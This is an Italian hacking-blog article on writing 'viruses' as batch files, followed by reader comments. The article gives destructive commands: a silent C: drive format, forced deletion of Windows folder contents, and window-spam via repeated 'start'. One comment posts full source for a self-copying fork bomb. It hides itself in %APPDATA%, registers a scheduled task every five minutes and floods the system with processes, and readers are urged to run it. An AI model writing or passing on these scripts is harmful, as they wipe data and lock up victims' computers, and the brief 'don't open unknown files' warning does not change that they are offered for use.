Creare Virus in Batch

Con questo articolo vogliamo spiegare come possiamo essere infettati da dei semplici virus che possono essere scritti in linguaggio batch. Specifico che il termine virus in questo articolo sta ad intendere un software malevolo in generale non virus in senso stretto (così semplifichiamo e non ci perdiamo in lungaggini sulla differenza tra virus, worm, spyware ecc.)

Prima di cominciare dobbiamo comunque aggiungere che questi virus non sono molto pericolosi perchè, benchè possano creare danni seri, ormai nelle ultime versioni di windows bisogna avere il consenso dell’amministratore per apportare delle modifiche al file di sistema, quindi lo script malevolo non riuscirebbe ad agire indisturbato o verrebbe comunque bloccato.

Ancora una nota prima di cominciare: dobbiamo spiegare in cosa consistono gli script batch. Questi file (di solito di piccole dimensioni) sono salvati in formato .bat e non sono altro dei comandi che vengono dati al promt di ms-dos. Tutti coloro che hanno una minima conoscenza di dos possono creare questi file. Vediamo alcuni esempi di codice che possono aiutarci a capire meglio come funzionano questi virus. Contate che si creano semplicemente scrivendo il codice sul blocco note e salvandolo come “nome”.bat.

format c: /autotest /q /u

Salvando questo testo sul blocco note in un file .bat avrete creato un virus che formatta l’hard disk senza chiedere nessuna conferma all’utente. La maggioranza degli antivirus trova e annulla questo tipo di file.

start
start
start
start
….

Ognuno di questi comandi apre una finestra del prompt dei comandi di dos…immaginate cosa potrebbe succedere se scriveste 2000/3000 start.

erase /q C:/Windows/nomefile

Questo comando cancellerebbe il file “nomefile” dalla cartella Windows senza chiedere nessuna conferma di cancellazione.

deltree c:/Windows

In questo modo cancellerebbe tutto il contenuto della cartella windows. Bisogna dire in questo caso che questo comando nello specifico (come molti altri) è stato disattivato dalle ultime versioni di windows (per esempio nelle versioni Home di Win 7)

In conclusione dobbiamo aggiungere che questi comandi potrebbero essere combinati e messi uno dopo l’altro per creare più danni.

In questo articolo abbiamo visto solo alcune delle potenzialità dei file batch, ovviamente è una tecnica un po’ datata e con scarse possibilità di successo anche perchè il file deve essere eseguito per funzionare (anche se potrebbe essere messo in autorun) comunque ci ricorda una buona regola della sicurezza informatica: se non sappiamo da chi arriva o cosa contiene un file o una mail NON APRIAMOLO!

13 comments to “Creare Virus in Batch”
  1. Pingback: Tweets that mention Creare Virus in Batch | PillolHacking.Net -- Topsy.com

  2. Pingback: Technotizie.it

  3. Bell’articolo Dani, ma se nn mi chiami in causa nn mi sento partecipe xD
    Ecco: “vengono dati al promt di ms-dos.”

    Ed anche questa volta ho fatto il mio sporco lavoro 😀

  4. questo non è un virus. è uno script scemo, fatto da un lamer.

    Prima di tutto un virus, per essere definito tale, deve replicarsi (ed il tuo non lo fa)

    Seconda cosa: crei un file per lanciare un comando? a che pro?

    In questo articolo di “hacker” c’è solo un lontano miraggio.

    CHE SCHIFO!

  5. Mia nonna ieri mi ha inviato un file:
    nonna.bat

    Lo posso aprire? No perchè dopo aver letto la vostra guida ho paura. Complimenti ottimo articolo, lo farò leggere a babbo natale cosi la prosisma volta che mi invia un file per email con scritto buon-natale.bat!

    Bello.. .BELLISSIMO!!
    Sicuramente l’hai scritto tu il kernel di Windows, conosci troppe cose del DOS

    enjoy albm friend.
    saluti collega
    olfridenzen
    salut
    cia

  6. Raga è vero che lo script di sopra non è il massimo dell’hacking, però Dani aveva fatto una sottile premessa:

    “Specifico che il termine virus in questo articolo sta ad intendere un software malevolo in generale non virus in senso stretto (così semplifichiamo e non ci perdiamo in lungaggini sulla differenza tra virus, worm, spyware ecc.)”

    Quindi le vostre critiche (?) sono un tantino fuori luogo..

    ps: l’hacking è anche voglia di conoscere, e magari qualcuno che inizia non è a conoscenza dei file bat quindi l’articolo ha comunque una sua valenza 😉

  7. Sono pienamente d’accordo con TroUbIE: l’hacking è anche la conoscenza. Cito il jargon:

    The ‘hacker culture’ is actually a loosely networked collection of subcultures

    Traduzione (con Google :)):
    La ‘cultura hacker’ è in realtà una rete di raccolta delle sottoculture

    Anche se la traduzione non è al top, spero che citando il jargon si riesca a zittire l’ignoranza di Sandro e RoBYCoNTe. 😉

  8. Vado via un paio di giorni è succede il finimondo 😉

    A parte tutto, penso che TroUblE (che intanto ringrazio per la sua correzione…penso che ti manderò un premio xD) e Shadowy Viper abbiano già detto quanto c’era da dire ma voglio sottolineare solo una cosa:

    questo blog non è fatto solo per “esperti” come voi. Sapete, esistono delle persone sulla terra che alcune cose non le sanno (anche se penso che voi sappiate tutto visto i vostri commenti…) e che magari vorrebbero scoprirle, ma cosa ne so io: sono solo uno scrittore di scarso successo. 😉

  9. questa invece è una forkbomb creata da me… molto meglio che scrivere 2000 volte start! Provate a lanciarla… copia l’originale in un path specifico, setta un operazione schedulata in modo che parta in automatico ad ogni riavvio e crea un loop con un infinità di finestre ad una velocità incredibile obbligando a spegnere il pc dal pulsante di alimentazione… provare per credere!
    L’ho battezzata blacksheep, spero vi piaccia!

    @echo off
    setLocal EnableDelayedExpansion

    rem controlla esistenza del file e nel caso non esista lo copia e crea lo scheduled task e cancella l’originale
    IF EXIST %APPDATA%\bs.bat GOTO :FORKBOMB
    COPY %0 %APPDATA%\bs.bat
    SCHTASKS /Create /SC MINUTE /MO 5 /TN BlackSheep /TR %APPDATA%\bs.bat /F”
    GOTO :END

    :FORKBOMB
    rem CREA IL LOOP CON LA FORKBOMB
    :loop
    set /a X=10000
    set /a N+=1
    start /MIN %0
    start /MIN %0 %0
    if !N! gtr !X! goto :END2
    goto :loop

    :END
    del %0

    :END2
    exit

Comments are closed.